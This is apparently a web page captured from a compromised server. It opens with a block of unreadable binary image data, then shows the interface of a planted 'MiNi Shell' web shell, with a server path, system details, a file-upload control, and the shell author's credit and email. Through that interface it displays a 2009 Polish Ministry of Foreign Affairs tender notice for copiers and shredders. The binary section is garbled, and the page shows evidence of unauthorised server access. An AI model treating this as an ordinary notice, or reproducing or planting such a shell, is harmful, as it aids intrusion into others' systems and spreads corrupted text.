JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090708/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090708/229330-N-2009.html

<p class="kh_header"><b>Warszawa: ZAKUP WRAZ Z DOSTAWĄ BIUROWEGO WYPOSAŻENIA TECHNICZNEGO DLA POTRZEB MSZ</b><br>
<b>Numer ogłoszenia: 229330 - 2009; data zamieszczenia: 08.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Obsługi Ministerstwa Spraw Zagranicznych , Al. Szucha 23, 00-580 Warszawa, woj. mazowieckie, tel. 022 5239962, faks 022 6283363.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.msz.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZAKUP WRAZ Z DOSTAWĄ BIUROWEGO WYPOSAŻENIA TECHNICZNEGO DLA POTRZEB MSZ.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup wraz z dostawą biurowego wyposażenia technicznego dla potrzeb MSZ. 


PARAMETRY TECHNICZNE BIUROWEGO WYPOSAZENIA TECHNICZNEGO OBJĘTEGO PRZEDMIOTEM ZAMÓWIENIA


I) Urządzenia wielofunkcyjne: czarno - biała kopiarka, drukarka, kolorowy skaner, fax - zamawiana ilość -11 szt.

  1. technologia cyfrowa, laser
  2. format oryginału max. A4
  3. format kopii A6-A4
  4. prędkość kopiowania i drukowania min. 13 str. na min.
  5. rozdzielczość 600x600 dpi
  6. kopiowanie wielokrotne 1-99 kopii
  7. zoom 25-400%
  8. sortowanie elektroniczne w standardzie
  9. automatyczny podajnik oryginałów na min. 70 arkuszy
10. moduł drukowania dwustronnego
11. kaseta na papier na min. 300 arkuszy
12. drukarka sieciowa
13. skaner kolorowy
14. fax
15. urządzenie fabrycznie nowe, rok produkcji urządzenia 2009
16. wysokowydajne materiały eksploatacyjne: toner na min 10.0000 wydruków (oddzielnie toner i bęben)
17. CZARNO-BIAŁA, bez cartridgy kolorowych
18. dostawa, instalacja i szkolenie z obsługi w cenie maszyny
19. gwarancja 48 miesięcy, naprawy u klienta

II) Kopiarka czarno-biała o prędkości pracy 25 str. A4 na min - zamawiana ilość - 3 szt.

  1. technologia cyfrowa, laser
  2. format oryginału do A3
  3. format kopii A6-A3
  4. prędkość kopiowania i drukowania min. 25 str na min
  5. rozdzielczość 600x600 dpi
  6. kopiowanie wielokrotne 1-999 kopii
  7. zoom 25-400%
  8. sortowanie elektroniczne w standardzie
  9. automatyczny dwustronny podajnik oryginałów na min 70 arkuszy
10. moduł kopiowania i drukowania dwustronnego
11. 2 kasety na papier po min. 500 arkuszy każda
12. drukarka sieciowa
13. skaner sieciowy kolorowy
14. opcjonalnie fax sieciowy
15. szafka pod kopiarkę
16. urządzenie fabrycznie nowe, rok produkcji urządzenia 2009
17. wysokowydajne materiały eksploatacyjne: toner na min 20.000 wydruków (oddzielnie toner i bęben)
18. CZARNO-BIAŁA, bez cartridgy kolorowych
19. dostawa, instalacja i szkolenie z obsługi w cenie maszyny
20. gwarancja 48 miesięcy, naprawy u klienta


III) Niszczarka dokumentów -zamawiana ilość - 10 szt.

1.automatyczny włącznik Start/Stop uruchamiany fotokomórką
2.automatyczny Stop w momencie przepełnienia pojemnika z workiem na ścinki,
3.funkcja (stand-by)
4.automatyczne odcięcie zasilania w przypadku zaklinowania papieru lub odstawienia kosza
5.zabezpieczenie przed przegrzaniem silnika
6.łatwy sposób wymiany worka ze ścinkami
7.pojemność kosza na ścinki 35 L
8.hartowane stalowe wałki tnące niewrażliwe na zszywki i spinacze biurowe
9.mocny i energooszczędny silnik nie mniej niż 460W
10.szybkość pracy 240mm
11.szerokość cięcia -ścinki 0,8 na 9,5
12.wydajność (ilość kartek) DIN A4 70mg na m2-min 8
13.stopień bezpieczeństwa (wg.norm DIN) - 5 klasa tajności
14.instrukcja w języku polskim
15.gwarancja na urządzenie min.12 miesięcy
16.gwarancja na noże tnące min. 60 miesięcy
17.folder i katalog potwierdzający spełnienie wymagań w specyfikacji

IV) Niszczarka dokumentów -zamawiana ilość - 4 szt.

1.automatyczny włącznik Start na Stop uruchamiany fotokomórką
2.automatyczny Stop w momencie przepełnienia pojemnika z workiem na ścinki,
3.funkcja stand-by
4.automatyczne odcięcie zasilania w przypadku zaklinowania papieru lub odstawienia kosza
5.zabezpieczenie przed przegrzaniem silnika
6.łatwy sposób wymiany worka ze ścinkami
7.pojemność kosza na ścinki 85 L
8.hartowane stalowe wałki tnące niewrażliwe na zszywki i spinacze biurowe
9.mocny i energooszczędny silnik nie mniej niż 460 W
10.szerokość wejścia min 260mm
11.szerokość cięcia -ścinki 0,8 na 9,5
12.wydajność (ilość kartek) DIN A4 70mg m2-min 8
13.stopień bezpieczeństwa (wg.norm DIN) - 5 klasa tajności
14.instrukcja w języku polskim
15.gwarancja na urządzenie min.12 miesięcy
16.gwarancja na noże tnące min. 60 miesięcy
17.folder i katalog potwierdzający spełnienie wymagań w specyfikacji.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.12.11.00-4, 30.12.12.00-5, 30.23.21.10-8, 30.12.13.00-6, 30.19.14.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenia zamówienia mogą ubiegać się wykonawcy, którzy:
a) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
b) posiadają niezbędna wiedzę i doświadczenie oraz dysponują potencjałem technicznym i   osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
c) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie      zamówienia,
d) nie podlegają wykluczeniu z postępowania o udzielenia zamówienia na podstawie art. 24 ust. 1 i 2 ustawy z dnia 29 stycznia 2004r. -Prawo zamówień publicznych ( Dz. U. z 2007r. nr 223 poz. 1655 z późniejszymi zmianami).
2. Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie   dokumentów załączonych do oferty wymaganymi w pkt.6 SIWZ.
3. Ofertę wykonawcy wykluczonego uznaje się za odrzuconą. 
4. Zamawiający odrzuca ofertę jeżeli nastąpi przynajmniej jedna z przesłanek uregulowanych  w  art. 89 ust. 1 ustawy z dnia 29 stycznia 2004r. -Prawo zamówień publicznych (Dz. U. z 2007r. nr 223 poz. 1655 z późniejszymi zmianami).
5. Zamawiający zawiadamia równocześnie wszystkich wykonawców o wyborze oferty, odrzuceniu ofert oraz wykluczeniu ofert, podając uzasadnienie faktyczne oraz prawne..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Wykaz oświadczeń lub dokumentów, jakie mają dostarczyć wykonawcy w celu 
potwierdzenia spełniania warunków udziału w postępowaniu: 
W celu potwierdzenia spełnienia warunków udziału w postępowaniu, określonych w pkt.5.1. Wykonawcy muszą przedstawić następujące dokumenty:
a)	Wypełnione Oświadczenie o spełnianiu warunków z art. 22 ust.1 pkt. 1-3 ustawy  Prawo zamówień publicznych- (Załącznik nr 2 do SIWZ);
b)	Wypełnione Oświadczenie  o niepodleganiu wykluczeniu z postępowania na podst. Art. 22 ust 1 pkt 4 w związku z  art. 24  ustawy  Prawo zamówień publicznych- (Załącznik nr 3 do SIWZ);
c)	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji  działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
d)	Aktualne zaświadczenia  właściwego naczelnika  urzędu skarbowego oraz             właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca  nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne,  lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu. Zaświadczenia  muszą być wystawione nie wcześniej niż  3 miesiące przed upływem  terminu składania ofert;


Dokumenty wyszczególnione w lit. c), d) muszą być przedstawione w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem (każda strona) - przez Wykonawcę.
Zamawiający może żądać przedstawienia oryginału lub notarialnie potwierdzonej kopii dokumentu (np. jeśli przedstawiona kserokopia będzie nieczytelna lub będzie wzbudzać wątpliwości co do jej prawdziwości). 
Pozostałe wymagane dokumenty muszą być przestawione w formie oryginału. 

Treść oferty musi odpowiadać treści SIWZ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.msz.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Obsługi
Ministerstwa Spraw Zagranicznych 
Al. Szucha 23 
00-580 Warszawa..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.07.2009 godzina 11:00, miejsce: Dziennik Podawczy Ministerstwa Spraw Zagranicznych ,przy Al. Szucha 23, 00-580 Warszawa..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com